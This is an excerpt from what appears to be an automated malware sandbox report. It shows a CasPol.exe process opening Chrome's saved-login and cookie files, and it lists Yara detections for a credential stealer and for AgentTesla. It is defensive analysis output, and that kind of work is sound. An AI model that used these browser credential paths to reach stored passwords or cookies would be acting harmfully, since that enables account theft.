Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4076, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4076, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs